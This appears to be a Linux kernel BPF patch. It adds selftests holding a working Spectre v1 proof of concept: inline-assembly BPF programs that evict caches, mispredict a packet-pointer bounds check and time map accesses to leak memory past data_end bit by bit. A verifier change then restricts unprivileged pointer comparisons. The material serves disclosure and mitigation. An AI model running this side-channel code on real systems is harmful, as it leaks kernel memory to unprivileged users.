+		long long skipped = 0;
+		long long total = 0;
+		long long bad_loads = 0;
+		long long total_loads = 0;
+		__u64 qw = 0;
+
+		for (__u64 byte = 0; byte < 8; byte++) {
+			for (__u64 bit = 0; bit < 8; bit++) {
+
+				long long dmax = INT_MIN;
+				long long dmin = INT_MAX;
+				long long d = 0;
+				long long m = 0;
+#define M 8
+				int j = 0;
+				for (j = 0; true; j++) {
+					total_loads += 1;
+					skel = test_tc_bpf__open_and_load();
+					if (skel) {
+						long long t0 = 0, t1 = 0;
+
+						ret = exploit(skel,
+									  &skipped, &total,
+									  &t0, &t1,
+									  base_byte + byte, 1 << bit);
+						if (ret == -1) {
+							bad_loads += 1;
+							goto cleanup;
+						}
+						if (ret)
+							if (!ASSERT_OK(ret, "exploit"))
+								goto restore_cap;
+
+						if (j == 0) {
+							goto cleanup;
+						}
+
+						long long jd = t0 - t1;
+						dmax = jd > dmax ? jd : dmax;
+						dmin = jd < dmin ? jd : dmin;
+						d += jd;
+						m++;
+					}
+				cleanup:
+					test_tc_bpf__destroy(skel);
+
+					if (j == 64 * M) {
+						fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway");
+						break;
+					}
+
+					// Continue as long as result is inconclusive.
+					if (m >= M && (d / m >= 200 || d / m <= -200)) {
+						break;
+					}
+				}
+
+				d /= m;
+
+				fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j);
+
+				// little endian
+				__u64 b = !!(d < 0 ? 0 : 1);
+				qw |= b << ((byte * 8) + bit);
+			}
+		}
+		fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n"
+				"\t>%lld percent bad samples; %lld percent bad loads\n",
+				base_byte, base_byte - 42 - 128, qw,
+				(skipped * 100) / total,
+				(bad_loads * 100) / total_loads);
 
-	test_tc_bpf__destroy(skel);
+	}
+
+	ASSERT_OK(-1, "exploit");
 
 restore_cap:
 	if (caps)
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
old mode 100644
new mode 100755
index ef7da419632a..c5344255ce88
--- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c
@@ -4,6 +4,7 @@
 #include <bpf/bpf_helpers.h>
 #include <linux/if_ether.h>
 #include <linux/ip.h>
+#include "bpf_misc.h"
 
 /* Dummy prog to test TC-BPF API */
 
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb)
 	return 0;
 }
 
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */
-SEC("tcx/ingress")
-int pkt_ptr(struct __sk_buff *skb)
-{
-	struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr);
+/* pkt-ptr-based Spectre v1 gadget */
 
-	if ((long)(iph + 1) > (long)skb->data_end)
-		return 1;
-	return 0;
+#define LEAKMAP_ENTRIES (5 * 512)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, LEAKMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} leakmap SEC(".maps");
+
+#define L1_SIZE_KiB 128
+#define SIZEOF_CACHELINE 64
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+
+struct {
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, EVICTMAP_ENTRIES);
+	__type(key, __u32);
+	__type(value, __u64);
+} evictmap SEC(".maps");
+
+static long callback_fn(__u32 index, void *ctx) {
+// sizeof(u64) * 8 is one 64-byte cacheline
+	__u32 key = index * 8 + (index % 8);
+	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
+	if (value) {
+		*value += 1;
+		return 0;
+	}
+	return 1;
 }
+
+#define STRINGIFY(x) #x
+#define TOSTRING(x) STRINGIFY(x)
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define OFFSET 350
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef OFFSET
+#undef MASK
+
+// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128
+#define OFFSET 366
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 367
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 368
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 369
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 370
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 371
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 372
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+#define OFFSET 373
+#include "test_tc_bpf_pkt_ptr_byte.h"
+#undef OFFSET
+
+char LICENSE[] SEC("license") = "GPL";
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
new file mode 100644
index 000000000000..2cd6ab000e4d
--- /dev/null
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
@@ -0,0 +1,172 @@
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include "bpf_misc.h"
+
+/*
+cd /root/bpf && ./ltb/sbin/bpftool prog loadall ./test_tc_bpf.bpf.o /sys/fs/bpf/tc && ./ltb/sbin/bpftool prog dump jited pinned /sys/fs/bpf/tc/pkt_ptr
+
+*/
+
+#undef SHIFT
+#if MASK == 1
+#define SHIFT 9
+#endif
+#if MASK == 2
+#define SHIFT 8
+#endif
+#if MASK == 4
+#define SHIFT 7
+#endif
+#if MASK == 8
+#define SHIFT 6
+#endif
+#if MASK == 16
+#define SHIFT 5
+#endif
+#if MASK == 32
+#define SHIFT 4
+#endif
+#if MASK == 64
+#define SHIFT 3
+#endif
+#if MASK == 128
+#define SHIFT 2
+#endif
+
+SEC("tcx/ingress")
+__naked
+void NAME(OFFSET, MASK)(void)
+{
+	// +76: data
+	// +80: data_end
+	asm volatile (
+		"r7 = r1;"
+
+		// Prepare data in callee-saved register that is not used by bpf_loop
+		// and callback_fn (and therefore not saved/restored).
+		"r9 = *(u32 *)(r7 + 76);"
+		"r8 = r9;"
+		// Construct bad ptr
+		"r9 += " TOSTRING(OFFSET) ";"
+
+		// Prepare warm up gadget
+		"r8 += 166;" // 128 payload + 42 header - 4
+		"r0 = *(u32 *)(r7 + 80);" // data_end
+		"if r0 <= r8 goto err_%=;"
+
+		// Iterate over 8MiB to evict data_end cacheline from 1536-entry STLB
+		// and core's 2.5MiB L3.
+		"r1 = 1024;" // *= 8 in callback
+		"r1 *= 128;"
+		"r2 = %[callback_fn] ll;"
+		"r3 = 0;"
+        "*(u64 *)(r10 - 8) = r3;"
+        "r3 = r10;"
+        "r3 += -8;"
+		"r4 = 0;"
+		"call %[bpf_loop];"
+
+		// Warm secret TLB, improves accuracy
+		"r5 = *(u8 *)(r8 + 0);"
+
+		"r8 = r9;"
+		// Wait for TLB to resolve page by storing to unitialized stack slot which will insert an lfence.
+		"*(u64 *)(r10 - 16) = r5;"
+
+		// Check bpf_loop err
+		"if r0 == 0 goto err_%=;"
+
+		// Prepare bpf_map_lookup_elem() args
+		"r1 = %[leakmap] ll;"
+		"r2 = r10;"
+		"r2 += -8;"
+		// Gadget
+		"r3 = *(u32 *)(r7 + 80);" // slow data_end load
+		"if r3 <= r8 goto check0_%=;" // mispredicted branch
+		// "r5 = 0x84;" // for testing gadget without load
+		"r5 = *(u8 *)(r9 + 0);" // fast secret load
+		"r5 &= " TOSTRING(MASK) ";"
+		"r5 <<= " TOSTRING(SHIFT) ";"
+		"*(u64*)(r10 - 8) = r5;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto err_%=;"
+		"r0 = *(u64 *)(r0 + 0);" // leak secret into leakmap[0|512].is_cached
+
+		// Adds lfence, to make sure we don't speculate into the check code
+		"*(u64 *)(r10 - 24) = r0;"
+
+		"check0_%=:"
+
+#undef TIME_R7
+#define TIME_R7()								\
+		"*(u64*)(r10 - 8) = r7;"				\
+		"call %[bpf_ktime_get_ns];"				\
+		"r6 = r0;"								\
+		"r1 = %[leakmap] ll;"					\
+		"r2 = r10;"								\
+		"r2 += -8;"								\
+		"call %[bpf_map_lookup_elem];"			\
+		"if r0 == 0 goto err_%=;"				\
+		"r1 = *(u64 *)(r0 + 0);"				\
+		"r7 = r0;"								\
+		"call %[bpf_ktime_get_ns];"				\
+		"r0 -= r6;"								\
+		"*(u64 *)(r7 + 0) = r0;"
+
+        // warm instruction caches
+		"r7 = 1024;"
+		TIME_R7()
+
+		// uncached access for comp.
+		"r7 = 1536;"
+		TIME_R7()
+
+		// test 0 delay
+		"r7 = 0;"
+		TIME_R7()
+
+		// test 1 delay
+		"r7 = 512;"
+		TIME_R7()
+
+		// cached access for comp.
+		"r7 = 1024;"
+		TIME_R7()
+
+		// set err=0
+		"r1 = %[leakmap] ll;"
+		"r2 = 2048;"
+		"*(u64*)(r10 - 8) = r2;"
+		"r2 = r10;"
+		"r2 += -8;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto err_%=;"
+        "r1 = 0;" // err
+		"*(u64 *)(r0 + 0) = r1;"
+
+		"goto exit_%=;"
+
+		"err_%=:"
+		"r1 = %[leakmap] ll;"
+		"r2 = 2048;"
+		"*(u64*)(r10 - 8) = r2;"
+		"r2 = r10;"
+		"r2 += -8;"
+		"call %[bpf_map_lookup_elem];"
+		"if r0 == 0 goto exit_%=;"
+        "r1 = 2;" // err = other
+		"*(u64 *)(r0 + 0) = r1;"
+
+		"exit_%=:"
+		"r0 = 2;" // TC_ACT_SHOT, drop packet
+		"exit;"
+		:
+		: __imm_addr(leakmap),
+		  __imm_addr(callback_fn),
+		  __imm(bpf_loop),
+		  __imm(bpf_ktime_get_ns),
+		  __imm(bpf_map_lookup_elem)
+		: __clobber_all);
+}
diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
new file mode 100644
index 000000000000..b73ee23a59ec
--- /dev/null
+++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
@@ -0,0 +1,31 @@
+#define MASK 1
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 2
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 4
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 8
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 16
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 32
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 64
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
+
+#define MASK 128
+#include "test_tc_bpf_pkt_ptr.h"
+#undef MASK
diff mbox series

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index bb78212fa5b2..b415a81149ed 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -14050,12 +14050,6 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		return -EINVAL;
 	}
 
-	/* check src2 operand */
-	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
-	if (err)
-		return err;
-
-	dst_reg = &regs[insn->dst_reg];
 	if (BPF_SRC(insn->code) == BPF_X) {
 		if (insn->imm != 0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14067,13 +14061,12 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		if (err)
 			return err;
 
-		src_reg = &regs[insn->src_reg];
-		if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) &&
-		    is_pointer_value(env, insn->src_reg)) {
+		if (is_pointer_value(env, insn->src_reg)) {
 			verbose(env, "R%d pointer comparison prohibited\n",
 				insn->src_reg);
 			return -EACCES;
 		}
+		src_reg = &regs[insn->src_reg];
 	} else {
 		if (insn->src_reg != BPF_REG_0) {
 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
@@ -14081,6 +14074,12 @@  static int check_cond_jmp_op(struct bpf_verifier_env *env,
 		}
 	}
 
+	/* check src2 operand */
+	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
+	if (err)
+		return err;
+
+	dst_reg = &regs[insn->dst_reg];
 	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
 
 	if (BPF_SRC(insn->code) == BPF_K) {